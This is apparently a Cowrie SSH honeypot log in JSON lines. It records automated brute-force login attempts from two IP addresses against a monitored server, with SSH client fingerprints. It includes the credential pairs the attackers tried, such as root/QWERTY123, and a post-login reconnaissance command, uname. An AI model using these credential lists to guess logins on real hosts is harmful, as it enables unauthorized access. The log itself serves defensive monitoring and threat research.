{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:00:02.180310Z","src_ip":"212.227.235.229","session":"9c50654aebc2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:03.104740Z","src_ip":"212.227.235.229","session":"9c50654aebc2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:04.343432Z","src_ip":"212.227.235.229","session":"9c50654aebc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56718,"dst_ip":"1.2.3.4","dst_port":22,"session":"66ce2ed10a5f","protocol":"ssh","message":"New connection: 212.227.235.229:56718 (1.2.3.4:22) [session: 66ce2ed10a5f]","sensor":"my-vps","timestamp":"2025-08-31T01:00:04.569793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:00:04.570890Z","src_ip":"212.227.235.229","session":"66ce2ed10a5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:00:04.802748Z","src_ip":"212.227.235.229","session":"66ce2ed10a5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41706,"dst_ip":"1.2.3.4","dst_port":22,"session":"469b7bcab0bf","protocol":"ssh","message":"New connection: 212.227.125.160:41706 (1.2.3.4:22) [session: 469b7bcab0bf]","sensor":"my-vps","timestamp":"2025-08-31T01:00:05.291094Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:00:05.783393Z","src_ip":"212.227.235.229","session":"66ce2ed10a5f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:05.887977Z","src_ip":"212.227.125.160","session":"469b7bcab0bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:00:05.904752Z","src_ip":"212.227.125.160","session":"469b7bcab0bf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:06.020910Z","src_ip":"212.227.235.229","session":"66ce2ed10a5f"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:06.025022Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48480,"dst_ip":"1.2.3.4","dst_port":22,"session":"36ecad08f5a1","protocol":"ssh","message":"New connection: 212.227.125.160:48480 (1.2.3.4:22) [session: 36ecad08f5a1]","sensor":"my-vps","timestamp":"2025-08-31T01:00:08.742164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:08.743116Z","src_ip":"212.227.125.160","session":"36ecad08f5a1"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456789","message":"login attempt [debian/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:08.746795Z","src_ip":"212.227.125.160","session":"469b7bcab0bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:00:08.818006Z","src_ip":"212.227.125.160","session":"36ecad08f5a1"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:09.109426Z","src_ip":"212.227.125.160","session":"36ecad08f5a1"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:10.236436Z","src_ip":"212.227.125.160","session":"469b7bcab0bf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:10.257913Z","src_ip":"212.227.125.160","session":"36ecad08f5a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38080,"dst_ip":"1.2.3.4","dst_port":22,"session":"35fcf916c4a7","protocol":"ssh","message":"New connection: 212.227.125.160:38080 (1.2.3.4:22) [session: 35fcf916c4a7]","sensor":"my-vps","timestamp":"2025-08-31T01:00:19.134631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:19.135351Z","src_ip":"212.227.125.160","session":"35fcf916c4a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:00:19.209242Z","src_ip":"212.227.125.160","session":"35fcf916c4a7"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:19.432392Z","src_ip":"212.227.125.160","session":"35fcf916c4a7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:20.560684Z","src_ip":"212.227.125.160","session":"35fcf916c4a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49174,"dst_ip":"1.2.3.4","dst_port":22,"session":"7713c1cd3286","protocol":"ssh","message":"New connection: 212.227.125.160:49174 (1.2.3.4:22) [session: 7713c1cd3286]","sensor":"my-vps","timestamp":"2025-08-31T01:00:29.609853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:29.610908Z","src_ip":"212.227.125.160","session":"7713c1cd3286"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:00:29.683614Z","src_ip":"212.227.125.160","session":"7713c1cd3286"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:29.908911Z","src_ip":"212.227.125.160","session":"7713c1cd3286"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:31.043841Z","src_ip":"212.227.125.160","session":"7713c1cd3286"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47324,"dst_ip":"1.2.3.4","dst_port":22,"session":"2167bfe3656c","protocol":"ssh","message":"New connection: 212.227.125.160:47324 (1.2.3.4:22) [session: 2167bfe3656c]","sensor":"my-vps","timestamp":"2025-08-31T01:00:40.008870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:40.009742Z","src_ip":"212.227.125.160","session":"2167bfe3656c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:00:40.084171Z","src_ip":"212.227.125.160","session":"2167bfe3656c"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:40.360956Z","src_ip":"212.227.125.160","session":"2167bfe3656c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:41.517830Z","src_ip":"212.227.125.160","session":"2167bfe3656c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35094,"dst_ip":"1.2.3.4","dst_port":22,"session":"b24812ff5b37","protocol":"ssh","message":"New connection: 212.227.235.229:35094 (1.2.3.4:22) [session: b24812ff5b37]","sensor":"my-vps","timestamp":"2025-08-31T01:00:45.817559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:46.169883Z","src_ip":"212.227.235.229","session":"b24812ff5b37"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:00:46.170574Z","src_ip":"212.227.235.229","session":"b24812ff5b37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39476,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fbdd2da9cb9","protocol":"ssh","message":"New connection: 212.227.125.160:39476 (1.2.3.4:22) [session: 5fbdd2da9cb9]","sensor":"my-vps","timestamp":"2025-08-31T01:00:50.453890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:00:50.454629Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:00:50.529284Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:00:50.754303Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:00:51.085265Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:00:51.086108Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:51.161149Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:51.162790Z","src_ip":"212.227.125.160","session":"5fbdd2da9cb9"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password","message":"login attempt [debian/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:00:51.860232Z","src_ip":"212.227.235.229","session":"b24812ff5b37"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:53.945925Z","src_ip":"212.227.235.229","session":"b24812ff5b37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52288,"dst_ip":"1.2.3.4","dst_port":22,"session":"d05a38f36992","protocol":"ssh","message":"New connection: 212.227.125.160:52288 (1.2.3.4:22) [session: d05a38f36992]","sensor":"my-vps","timestamp":"2025-08-31T01:01:00.844925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:00.846065Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:00.918954Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
